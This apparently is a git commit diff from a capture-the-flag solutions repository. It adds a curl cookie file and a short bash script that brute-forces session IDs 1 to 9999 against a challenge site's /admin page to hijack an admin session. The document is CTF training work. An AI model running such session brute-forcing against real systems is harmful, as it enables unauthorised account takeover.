Second CTFs part
This commit is contained in:
6
web-auth/too_small/cookie-output.txt
Normal file
6
web-auth/too_small/cookie-output.txt
Normal file
@@ -0,0 +1,6 @@
|
||||
# Netscape HTTP Cookie File
|
||||
# https://curl.se/docs/http-cookies.html
|
||||
# This file was generated by libcurl! Edit at your own risk.
|
||||
|
||||
too-small-reminder.challs.olicyber.it FALSE / FALSE 0 session_id 1337
|
||||
|
||||
8
web-auth/too_small/force.sh
Executable file
8
web-auth/too_small/force.sh
Executable file
@@ -0,0 +1,8 @@
|
||||
#!/bin/bash
|
||||
|
||||
for i in $(seq 1 9999);
|
||||
do
|
||||
echo "Session id=$i"
|
||||
curl -b "session_id=$i" http://too-small-reminder.challs.olicyber.it/admin
|
||||
|
||||
done
|
||||
Reference in New Issue
Block a user